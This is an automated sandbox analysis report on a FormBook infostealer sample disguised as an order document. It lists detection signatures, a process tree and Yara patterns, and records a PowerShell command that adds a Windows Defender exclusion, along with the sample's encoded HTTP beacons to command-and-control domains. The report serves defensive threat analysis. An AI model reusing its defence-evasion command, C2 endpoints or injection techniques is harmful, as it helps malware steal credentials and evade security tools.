Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe

Overview

General Information

Sample name:Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe
Analysis ID:1467083
MD5:7c33fb31e0b8302eba116a02e649200b
SHA1:b8cf4b26acf2cfb9f48ccc49a05b308425cbbd07
SHA256:b250139ddfe1f4e0849357b17563dcd09d2dc82f69730c7e5e3797148b47ce16
Tags:exe
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected FormBook
.NET source code contains potential unpacker
.NET source code contains very large array initializations
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates processes with suspicious names
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe (PID: 2136 cmdline: "C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe" MD5: 7C33FB31E0B8302EBA116A02E649200B)
    • powershell.exe (PID: 1432 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6332 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe (PID: 2012 cmdline: "C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe" MD5: 7C33FB31E0B8302EBA116A02E649200B)
      • EUSOiCcoIEEJJ.exe (PID: 2084 cmdline: "C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • compact.exe (PID: 5644 cmdline: "C:\Windows\SysWOW64\compact.exe" MD5: 5CB107F69062D6D387F4F7A14737220E)
          • EUSOiCcoIEEJJ.exe (PID: 6800 cmdline: "C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 404 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.2506231029.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000005.00000002.2506231029.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2e1c3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x177f2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    0000000A.00000002.4564032756.0000000002E10000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      0000000A.00000002.4564032756.0000000002E10000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2ae20:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x1444f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      0000000A.00000002.4565204551.00000000030A0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 11 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        5.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          5.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2d3c3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x169f2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          5.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            5.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2e1c3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x177f2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe", ParentImage: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe, ParentProcessId: 2136, ParentProcessName: Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe", ProcessId: 1432, ProcessName: powershell.exe
            Sigma detected: Powershell Defender Exclusion
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe", ParentImage: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe, ParentProcessId: 2136, ParentProcessName: Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe", ProcessId: 1432, ProcessName: powershell.exe
            Sigma detected: Non Interactive PowerShell Process Spawned
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe", ParentImage: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe, ParentProcessId: 2136, ParentProcessName: Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe", ProcessId: 1432, ProcessName: powershell.exe

            Snort Signatures

            No Snort rule has matched

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus detection for URL or domain
            Source: http://www.architect-usschool.com/s24g/Avira URL Cloud: Label: malware
            Source: http://architect-usschool.com/s24g/?Y6vp=3PLd8j&OdjTHtuX=4rIlPCx72NWCI0QJXJwDAvira URL Cloud: Label: malware
            Source: http://www.architect-usschool.com/s24g/?Y6vp=3PLd8j&OdjTHtuX=4rIlPCx72NWCI0QJXJwD+tzjHhGgLlyDkrck6XhMS8VcXSbKvpDPBj6V0V8nuLzRy/FwKWDUEv1cw0ImnsIqFnkVImpc8YyZ7gWSicgk/ENTSAvixeUyT+Tq9osdZT4ae7dFHSM=Avira URL Cloud: Label: malware
            Source: http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefixAvira URL Cloud: Label: malware
            Source: http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eotAvira URL Cloud: Label: malware
            Multi AV Scanner detection for submitted file
            Source: Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeReversingLabs: Detection: 23%
            Yara detected FormBook
            Source: Yara matchFile source: 5.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000005.00000002.2506231029.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.4564032756.0000000002E10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.4565204551.00000000030A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2506704352.0000000000E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.4571364654.00000000032E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.4576370278.0000000004DC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.4571646187.0000000003D30000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2507910619.0000000002B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for sample
            Source: Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeJoe Sandbox ML: detected
            Source: Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: compact.pdbGCTL source: Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe, 00000005.00000002.2506815789.0000000000E58000.00000004.00000020.00020000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 00000009.00000003.2651430615.0000000000D7B000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: EUSOiCcoIEEJJ.exe, 00000009.00000002.4564033459.000000000064E000.00000002.00000001.01000000.0000000C.sdmp, EUSOiCcoIEEJJ.exe, 0000000D.00000002.4565010474.000000000064E000.00000002.00000001.01000000.0000000C.sdmp
            Source: Binary string: wntdll.pdbUGP source: Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe, 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, compact.exe, 0000000A.00000003.2509176695.00000000033E6000.00000004.00000020.00020000.00000000.sdmp, compact.exe, 0000000A.00000002.4571886070.0000000003590000.00000040.00001000.00020000.00000000.sdmp, compact.exe, 0000000A.00000003.2506580871.00000000031EC000.00000004.00000020.00020000.00000000.sdmp, compact.exe, 0000000A.00000002.4571886070.000000000372E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe, Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe, 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, compact.exe, compact.exe, 0000000A.00000003.2509176695.00000000033E6000.00000004.00000020.00020000.00000000.sdmp, compact.exe, 0000000A.00000002.4571886070.0000000003590000.00000040.00001000.00020000.00000000.sdmp, compact.exe, 0000000A.00000003.2506580871.00000000031EC000.00000004.00000020.00020000.00000000.sdmp, compact.exe, 0000000A.00000002.4571886070.000000000372E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: CAhp.pdbSHA256 source: Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe
            Source: Binary string: compact.pdb source: Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe, 00000005.00000002.2506815789.0000000000E58000.00000004.00000020.00020000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 00000009.00000003.2651430615.0000000000D7B000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: CAhp.pdb source: Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_02E2C170 FindFirstFileW,FindNextFileW,FindClose,10_2_02E2C170
            Source: C:\Windows\SysWOW64\compact.exeCode function: 4x nop then xor eax, eax10_2_02E196F0
            Source: C:\Windows\SysWOW64\compact.exeCode function: 4x nop then mov ebx, 00000004h10_2_034E053F

            Networking

            barindex
            Performs DNS queries to domains with low reputation
            Source: DNS query: www.hellokong.xyz
            Source: Joe Sandbox ViewIP Address: 64.190.62.22 64.190.62.22
            Source: Joe Sandbox ViewIP Address: 203.161.49.220 203.161.49.220
            Source: Joe Sandbox ViewASN Name: VNPT-AS-VNVNPTCorpVN VNPT-AS-VNVNPTCorpVN
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /jmiz/?Y6vp=3PLd8j&OdjTHtuX=FlIs+r8zH5IdzVyrxFdSYjESHC6F8ED2JjV8fIhoTiEGriidwWKKTvYGFckMGyNztz9f5I1p/5DHHhHlE1nDIZgKO5qXvVh1+gwmyYcA+2CCaGrmZckpjuvJQ96WUy8TtzIG0Do= HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.fondazionegtech.orgUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
            Source: global trafficHTTP traffic detected: GET /92z0/?OdjTHtuX=Gchg326o6RWN/XFADw/V4eD2MO3apSP8yQOPkbolGTbWXGJL1kFLipwvr6KFDeoH1MC+XiIJPCdl50bZjywkZNBk97uFxrq9QGi9z8UXs1GhAfMLlFrOVkcHu0q9EP6WPl8Zh5k=&Y6vp=3PLd8j HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.mengistiebethlehem.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
            Source: global trafficHTTP traffic detected: GET /oc7s/?Y6vp=3PLd8j&OdjTHtuX=ITz00edB1Uq7JDbRPTK5B57t89T2WQZ+hnFFsCQVLpiDf2LeJizgG+jH2jz5I+TBlRR/yAoHWWMQTB4d0WCMdZHpvgPMtRMFWqdBjyYGuisLgsnAd4XsPoSnl82L2CWvs48fsL0= HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.ad14.funUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
            Source: global trafficHTTP traffic detected: GET /2769/?OdjTHtuX=rQ9MRvShllEvhf19NmQGPjdBfvwxqGfh/iQ/JyzvIKd3JVnhiEf6Ad8S1fm4YmYs4WBXtXN2+GWeVsdjOCq4N3yCg9FNbaHUg89/agQhGCosY8uNQEp6VxplmSeNniynJ3fH1F8=&Y6vp=3PLd8j HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.epicbazaarhub.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
            Source: global trafficHTTP traffic detected: GET /wvam/?Y6vp=3PLd8j&OdjTHtuX=ppN4Kg7gaCRo+jf4iLEmna60kcJd+oo7/wZIRMT4+Man5OlGV28GmQNPMVld/mi8klF/kBnYjgc4RUC2chY7WuIAYm4xk+Ll6sKGI2rWgbxJmoqgO5rVx7RJwqzCMQvvfrLjQU4= HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.rz6grmvv.shopUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
            Source: global trafficHTTP traffic detected: GET /oui5/?OdjTHtuX=SBbMJInblZiNUqJtj2t3oAZeaf7w1Mr63FaPzYR5npk3jTg+edZF9NME4tF9tViJCHx7c4tSq6N/qcOwzg98IChDG2ekcZOWcYJRK2znKimA3GQ/fbvAwxxdlKlVh8HBUwdv3Sg=&Y6vp=3PLd8j HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.hellokong.xyzUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
            Source: global trafficHTTP traffic detected: GET /s24g/?Y6vp=3PLd8j&OdjTHtuX=4rIlPCx72NWCI0QJXJwD+tzjHhGgLlyDkrck6XhMS8VcXSbKvpDPBj6V0V8nuLzRy/FwKWDUEv1cw0ImnsIqFnkVImpc8YyZ7gWSicgk/ENTSAvixeUyT+Tq9osdZT4ae7dFHSM= HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.architect-usschool.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
            Source: global trafficHTTP traffic detected: GET /3jr0/?OdjTHtuX=C6nbN3Z6SrmD48dKFL5Pdr+cZFmYp1QsQ3e628IyGZcRZCB2vhKb6ox4g6I37OYbmAVSFMbRXnVDWcusSAPk0vfQfIagm0ASlZK02lSA38wn9PDfH1oUKWJrxTMbBcOAU+1qziI=&Y6vp=3PLd8j HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.easybackpage.netUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
            Source: global trafficHTTP traffic detected: GET /mwa4/?Y6vp=3PLd8j&OdjTHtuX=BKtoJfTGgHJzrpd1kXP6JuCpnJS0Vaq/yhZppoO2EP353cwV9Kf7u0HM3e0YD5Mg8P8TnPOgCoBiwA2kvNm9UdnLeQplEPepVbn/svzmQdla2L+ZsYtoIxEUyzWZOW0K59hRfLs= HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.superunicornpalace.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
            Source: global trafficHTTP traffic detected: GET /rxdf/?OdjTHtuX=n5pckC1kDFTF1S5BKIsmiJ5ryDhRlCYaQVQlc2liktwXiyajKP48Wkncu6FoMqtxFtMv+2TSpEcAsDV+dI8BV0td651LvJeUOcJvnAipjtqBUQAoEW2kSo5oIr+iYWP+5LowsUg=&Y6vp=3PLd8j HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.tedjp-x.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
            Source: global trafficHTTP traffic detected: GET /n8zi/?Y6vp=3PLd8j&OdjTHtuX=TDN237cw9XQsPbq3g6hYHsVRIrTNU69YOKlE8puzfHXbytTXePjBpDkk8R6CbNZjNtV+M1xTH1M7WEFVhsxtrVg+jjfEC0sBsxKcDNAG8QmzJp6ywkUHIkWAXYoQO53dC+2pPrw= HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.3cubesinterior.inUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
            Source: global trafficHTTP traffic detected: GET /s0j2/?OdjTHtuX=BcB93STIeRzesDqYzmgjF/8Aqg2qoGbugvfC7gVQd0Epq+RTfyEF6eLz+ZShIqPWgjFYuR+pkePM3whd8giEyH2988JCuLY+vIFLWxAqbBoWpgzIu1DPnhlaAUBnkOtEvd711RA=&Y6vp=3PLd8j HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.artvectorcraft.storeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
            Source: global trafficHTTP traffic detected: GET /pv57/?OdjTHtuX=6UcJOPuI3ds3m8dRFaGqe18kk0aRE6C9zfep+6iQQcPKXv8sEJKo1I2dFrwlAwFzKSJLgqMZnt8gW4RLGDqdj2op7I/d7Qwx4DLM/Sb7UzOzABLy3akf6gQBeurdxZRPhPoEffE=&Y6vp=3PLd8j HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.hondamechanic.todayUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
            Source: global trafficDNS traffic detected: DNS query: www.fondazionegtech.org
            Source: global trafficDNS traffic detected: DNS query: www.mengistiebethlehem.com
            Source: global trafficDNS traffic detected: DNS query: www.ad14.fun
            Source: global trafficDNS traffic detected: DNS query: www.epicbazaarhub.com
            Source: global trafficDNS traffic detected: DNS query: www.rz6grmvv.shop
            Source: global trafficDNS traffic detected: DNS query: www.hellokong.xyz
            Source: global trafficDNS traffic detected: DNS query: www.architect-usschool.com
            Source: global trafficDNS traffic detected: DNS query: www.easybackpage.net
            Source: global trafficDNS traffic detected: DNS query: www.superunicornpalace.com
            Source: global trafficDNS traffic detected: DNS query: www.tedjp-x.com
            Source: global trafficDNS traffic detected: DNS query: www.3cubesinterior.in
            Source: global trafficDNS traffic detected: DNS query: www.artvectorcraft.store
            Source: global trafficDNS traffic detected: DNS query: www.macklaer.com
            Source: global trafficDNS traffic detected: DNS query: www.hondamechanic.today
            Source: unknownHTTP traffic detected: POST /92z0/ HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cache-Control: max-age=0Content-Length: 213Content-Type: application/x-www-form-urlencodedConnection: closeHost: www.mengistiebethlehem.comOrigin: http://www.mengistiebethlehem.comReferer: http://www.mengistiebethlehem.com/92z0/User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like GeckoData Raw: 4f 64 6a 54 48 74 75 58 3d 4c 65 4a 41 30 41 61 6c 79 6c 37 66 7a 6a 68 30 51 6d 2f 39 39 4d 72 45 4a 50 50 7a 71 78 44 4b 30 31 43 64 70 62 77 42 4f 6a 65 6f 58 56 74 76 31 6d 52 76 69 75 63 6d 2f 4e 7a 39 63 65 78 42 31 4f 79 54 54 58 6b 57 4d 53 64 62 39 56 37 41 75 78 49 44 59 4b 6b 2b 37 2f 4c 6b 33 6f 61 6a 63 31 69 2f 34 38 67 32 2b 31 47 53 41 2f 4d 6e 7a 6c 54 44 46 6d 73 76 6a 32 71 4a 4b 73 6d 42 55 47 49 4c 38 76 55 64 47 53 39 55 66 68 32 69 37 39 54 70 45 31 32 34 42 58 65 75 61 57 32 4b 51 78 69 41 54 5a 31 30 2f 44 71 73 6d 32 43 63 6f 75 64 57 52 63 31 71 47 45 37 66 4f 69 6b 43 42 6a 74 78 54 4b 63 73 33 38 52 73 Data Ascii: OdjTHtuX=LeJA0Aalyl7fzjh0Qm/99MrEJPPzqxDK01CdpbwBOjeoXVtv1mRviucm/Nz9cexB1OyTTXkWMSdb9V7AuxIDYKk+7/Lk3oajc1i/48g2+1GSA/MnzlTDFmsvj2qJKsmBUGIL8vUdGS9Ufh2i79TpE124BXeuaW2KQxiATZ10/Dqsm2CcoudWRc1qGE7fOikCBjtxTKcs38Rs
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 15:57:19 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://epicbazaarhub.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: Accept-EncodingContent-Encoding: gzipContent-Length: 14879Content-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 dd b2 eb 96 eb 36 92 35 f8 fb e4 53 c0 f2 b2 53 b2 05 89 ba e5 85 4a 65 95 af 5d fe a6 dc f6 aa e3 ea 9a 6f 6c af 5c 20 19 22 71 12 04 58 00 28 a5 8e 2a 1f e6 5b f3 16 f3 b7 5f 6c 02 a4 ee a2 94 ca 4b 77 75 77 5e 48 22 10 b1 63 c7 8e 7d f3 c9 b7 3f 7d f3 cb ff fe f9 3b 92 d8 54 dc 9e dd b8 17 11 4c c6 a3 5a 66 e9 d7 7f a9 b9 18 b0 e8 f6 ec dd 4d 0a 96 91 30 61 da 80 1d d5 fe fa cb f7 f4 aa 46 da ab 1b c9 52 18 d5 26 1c a6 99 d2 b6 46 42 25 2d 48 cc 9c f2 c8 26 a3 08 26 3c 04 5a 1c 9a 84 4b 6e 39 13 d4 84 4c c0 a8 53 e0 6c c0 9c 6b 15 28 6b ce 57 20 e7 29 7b a0 3c 65 31 d0 4c 83 6b e2 0b a6 63 38 2f 0a 